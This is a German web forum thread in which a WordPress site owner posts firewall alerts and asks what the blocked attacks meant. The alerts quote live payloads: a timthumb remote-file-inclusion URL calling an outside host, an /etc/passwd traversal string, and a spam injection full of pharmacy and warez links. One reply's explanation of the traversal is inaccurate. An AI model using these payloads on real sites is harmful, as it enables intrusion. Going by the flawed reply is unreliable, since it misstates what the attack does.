ComputerBase Menü
Aktuelles

[Wordpress] WP-firewall, SQL injektion, offendering_url

azereus

azereus

Rear Admiral
Registriert
Okt. 2007
Beiträge
5.722
tag zusammen

vielleicht bin ich etwas paranoid - vielleicht aber auch nur übervorsichtig

in der heutigen zeit ist schutz einfach unumgänglich. vor allem wenn man selbst etwas betreibt und sich nicht ständig darum kümmern kann.

zur situation:
ich hab meine domain bei einem hoster meines vertrauens
benutze wordpress in der aktuellsten version
und nutze einige sicherheitsplugins

unter anderem die wordpress firewall


seit nem monat ungefähr häufen sich die kompromitierungsversuche
WP-firewall meldet mir beinahe wöchentlich 1-2 versuche

das sieht dann wie folgt aus
(bin nicht verantwortlich für das ansehen der links!!)
WordPress Firewall has detected and blocked a potential attack!

Web Page: $offending_url
Warning: URL may contain dangerous content!

Offending IP: 95.110.207.242 - http://ip-lookup.net/?ip=95.110.207.242
Offending Parameter: file = MEINVERZEICHNIS/MEIN-UNTERORDNER-DAZU...//wp-content/themes/widescreen/includes/timthumb.php?src=http://blogger.com.v2training.com.au/xcyb/xcyb.php

This may be a "Directory Traversal Attack."

For more information on this type of attack see: http://matthewpavkov.com/wordpress-plugins/wordpress-attacks.html
Zum Vergrößern anklicken....

WordPress Firewall has detected and blocked a potential attack!

Web Page: $offending_url
Warning: URL may contain dangerous content!

Offending IP: 195.182.22.3 - http://ip-lookup.net/?ip=195.182.22.3
Offending Parameter: gbmsg = <url>http://tramadol.trans-medi.com/tramadol-in-neuropathic-pain.html|Tramadol in neuropathic pain</url>, <url>http://vicodin.trans-medi.com/percocet-vicodin-darvocet.html|Percocet vicodin darvocet</url>, ypoxyu <url>http://trans-medi.com/pfizer-vs-ranbaxy-lipitor.html|Pfizer vs ranbaxy lipitor</url>, or wexxj <url>http://trans-medi.com/atorvastatin-price-80-mg.html|Atorvastatin price 80 mg</url>, orgybdea <url>http://trans-medi.com/lipitor-price-decrease.html|Lipitor price decrease</url>, oreamup, <url>http://tramadol.trans-medi.com/back-pain-tramadol-or-ibuprofin.html|Back pain tramadol or ibuprofin</url>, <url>http://ultram.trans-medi.com/ultram-600-mg.html|Ultram 600 mg</url>, <url>http://vicodin.trans-medi.com/vicodin-with-oxycodone.html|Vicodin with oxycodone</url>, <url>http://tram.one.x90x.net/tramadol-hcl-50mg-tablets.html|Tramadol hcl 50mg tablets</url>, <url>http://ultr.one.x90x.net/order-tramadol-online-pills.html|Order tramadol online pills</url>, <url>http://vico.one.x90x.net/vicodin-10mg-ingredients.html|Vicodin 10mg ingredients</url> .





<br />





<br />





<br />







<br />







<url>http://00a.prv.pl/sis-igri-dlya-nokia-5228.html|Sis igri dlya nokia 5228</url>, <url>http://55mmm.prv.pl/skachat-igru-gravity-na-telefon.html|Skachat\' igru gravity na telefon</url>, <url>http://ddc3.prv.pl/skachat-igri-na-senserniy-telefon.html|Skachat\' igri na senserniy telefon</url>, <url>http://ddt01.prv.pl/igri-dlya-android-233.html|Igri dlya android 2.3.3</url>, <url>http://ffrd.prv.pl/igri-android-na-kompyter.html|Igri android na komp\'yuter</url>, <url>http://ggt1.prv.pl/skachat-igri-na-nokia-x6.html|Skachat\' igri na nokia x6</url>, <url>http://gsf12.prv.pl/igru-na-telefon-taksi.html|Igru na telefon taksi</url>, <url>http://kkp9.prv.pl/skachat-igri-na-telefon-s5610.html|Skachat\' igri na telefon s5610</url>, <url>http://lhn78.prv.pl/psihologiya-jar.html|Psihologiya jar</url>, <url>http://mmg5.prv.pl/ball-igra-na-telefon.html|Ball igra na telefon</url>, <url>http://mms34.prv.pl/igri-dlya-sony-ericsson-u8i.html|Igri dlya sony ericsson u8i</url>, <url>http://qq1.prv.pl/igri-dlya-android-market.html|Igri dlya android market</url>, <url>http://sgt67.prv.pl/igri-dlya-telefona-lg-kp501.html|Igri dlya telefona lg kp501</url>, <url>http://ttr32.prv.pl/mob-ua-igri-samsung.html|Mob ua igri samsung</url>, <url>http://best87.prv.pl/java-player-skachat-besplatno.html|Java player skachat\' besplatno</url>, <url>http://f0ol.prv.pl/prilojeniya-na-telefon-igri-skachat.html|Prilojeniya na telefon igri skachat\'</url>, <url>http://kalsde.prv.pl/igri-na-samsung-e250i.html|Igri na samsung e250i</url>, <url>http://kpus1.prv.pl/skachat-besplatno-sis-hd-igri.html|Skachat\' besplatno sis hd igri</url>, <url>http://nmr78.prv.pl/igri-na-telefon-nokia-plemen.html|Igri na telefon nokia plemen</url>, <url>http://supremers.prv.pl/igra-sven-na-telefon.html|Igra sven na telefon</url>, <url>http://woptr.prv.pl/java-igra-1916-dogfight.html|Java igra 1916 dogfight</url>, <url>http://34fgh.prv.pl/java-knigi-novie-skachat.html|Java knigi novie skachat\'</url>, <url>http://dhio3.prv.pl/igri-na-telefon-nokia-s60.html|Igri na telefon nokia s60</url>, <url>http://fght.prv.pl/igri-telefon-samsung-e390.html|Igri telefon samsung e390</url>, <url>http://gfjy7.prv.pl/igri-dlya-android-23-320x240.html|Igri dlya android 2.3 320x240</url>, <url>http://gtyuo.prv.pl/nokia-n73-igri-bez-registracii.html|Nokia n73 igri bez registracii</url>, <url>http://kkff.prv.pl/igri-dlya-nokia-5-03.html|Igri dlya nokia 5 03</url>, <url>http://llfrt.prv.pl/vvod-teksta-javascript.html|Vvod teksta javascript</url>, <url>http://lsg4.prv.pl/igra-na-telefon-betmen.html|Igra na telefon betmen</url>, <url>http://nmer1.prv.pl/igri-na-samsung-e2222.html|Igri na samsung e2222</url>, <url>http://polokh.prv.pl/igri-na-samsung-gt-s5380d.html|Igri na samsung gt s5380d</url>, <url>http://57hhs.ch.vu/java-igri-k750.html|Java igri k750</url>, <url>http://sdfg1.prv.pl/sony-ericsson-x10-mini-igri.html|Sony ericsson x10 mini igri</url>, <url>http://games-javaas.prv.pl/javascript-12.html|Javascript 1.2</url>, <url>http://mob-game.prv.pl/skachat-tamagochi-jar.html|Skachat\' tamagochi jar</url>, <url>http://m-gamenew.prv.pl/igri-na-telefon-6300-bez-registracii.html|Igri na telefon 6300 bez registracii</url>, <url>http://mobi-game.prv.pl/igri-na-telefon-celie.html|Igri na telefon celie</url>, <url>http://m0-game.prv.pl/eroticheskie-igri-na-samsung.html|Eroticheskie igri na samsung</url>, <url>http://mob-game.opx.pl/samsung-s5380d-igri.html|Samsung s5380d igri</url>, <url>http://gamemob.pev.pl/igri-na-telefon-nokia-e7.html|Igri na telefon nokia e7</url>, <url>http://game-mobi.xlx.pl/igri-na-telefon-samsung-s5230.html|Igri na telefon samsung s5230</url>, <url>http://gamesm.htw.pl/igri-samsung-2232.html|Igri samsung 2232</url>,

This may be a "WordPress-Specific SQL Injection Attack."

For more information on this type of attack see: http://matthewpavkov.com/wordpress-plugins/wordpress-attacks.html
Zum Vergrößern anklicken....
WordPress Firewall has detected and blocked a potential attack!

Web Page: $offending_url
Warning: URL may contain dangerous content!

Offending IP: 201.27.8.181 - http://ip-lookup.net/?ip=201.27.8.181
Offending Parameter: p = ../../../../../../../../../../../../../../../../etc/passwd\0

This may be a "Directory Traversal Attack."

For more information on this type of attack see: http://matthewpavkov.com/wordpress-plugins/wordpress-attacks.html
Zum Vergrößern anklicken....

bin ich paranoid, übervorsichtig oder hätte schon was passieren können?
kann mir vielleicht jemand erklären was z.B. im ersten quote versucht wurde? warum ...includes/timthumb.php?src=http://blogg....?? was hätte das bewirkt?

ist die situation bei mir wirklich so dramatisch?
das zeut im zweiten quote sieht eher nach spam aus. kanns aber nicht genau sagen.

und der letzte quote... scheint mir derb böse zu sein was da versucht wurde
 
Hi,

wenn du wöchentlich nur 2 Versuche hast schätz dich glücklich .... ich hab im SSL Log von meinem Server manchmal 500 Versuche pro Stunde :=)

Bleibt bei Versuchen, root darf sich eh net einloggen.

Grüße,
d2boxSteve

PS: Software immer aktuell halten, dann solltest du sicher sein. Die aktuelle Meldung sagt ja nur, dass deine Software das erfolgreich abgewehrt hat, also alles ok ist.
 
Zuletzt bearbeitet:
das versteh ich doch noch. aber was würde man mit dem quote1+3 erreichen? der quote2 sieht wie gesagt eher nach spam aus.
 
Um deine Frage zu beantworten, was Quote 1 und 3 sein KÖNNTEN:
Quote 1erstellt werden, die mit einer externen Quelle geöffnet wurde um zum Beispiel schadcode in Form einer php-Datei auszuführen. Ist aber fehlgeschlagen wie du siehst, der Code wurde nicht ausgeführt. Ich empfehle auch dem Link NICHT zu folgen.
Quote 3 wechselt in das Linux-Verzeichnis /etc/passwd mit dem Parameter \0. Hört sich nach der einer Billig-Variante an um alle Passwörter zu löschen. Wie du gesehen hast, funktioniert auch das nicht, wobei mir der Nutzen dieser Aktion auch irgendwie nicht klar wird. Möglicherweise speichert Wordpress die Passwörter ja dort.
 
ah^^
naja... die WP-passwörter sind dann doch wo anders.
ja mit dem linux könntest recht haben. hab mein hirn schon im bett.
mit den ../../..... kommt der immer ein verzeichnis nach oben.
ich finds jetzt irgendwie witzig. wär interessant ob das alles ohne diese WP-firewall funktioniert hätte.

aus brasilien ist der mit seiner ip übrigens.
kann ich den irgendwie sperren? oder kann das mein host?
 
Du musst dich einloggen oder registrieren, um hier zu antworten.
Zurück
Oben

Willkommen auf ComputerBase!

Mit Werbung weiterlesen

Besuche ComputerBase wie gewohnt mit Werbung und Tracking. Die Zustimmung ist jederzeit widerrufbar.

Details im Privacy Center und in der Liste unserer Partner. Ein Widerruf ist möglich in der Datenschutzerklärung.

… oder ComputerBase Pro bestellen

Nutze ComputerBase ohne Werbebanner, Video-Ads und Werbetracking schon für 4 €/Monat oder 36 €/Jahr.

Mehr zu ComputerBase Pro

Bereits Pro-Nutzer? Hier anmelden.

Tracking: Wir und unsere 160 Partner verarbeiten personenbezogene Daten, indem wir mit auf Ihrem Gerät gespeicherten Informationen (z. B. eindeutige Kennungen in Cookies) ein Nutzungsprofil erstellen, um z. B. Anzeigen zu personalisieren. Verarbeitungszwecke: Genaue Standortdaten und Abfrage von Geräteeigenschaften zur Identifikation, Informationen auf einem Gerät speichern und/oder abrufen, Personalisierte Anzeigen und Inhalte, Anzeigen- und Inhaltsmessungen, Erkenntnisse über Zielgruppen und Produktentwicklungen.

Impressum Kontakt Datenschutz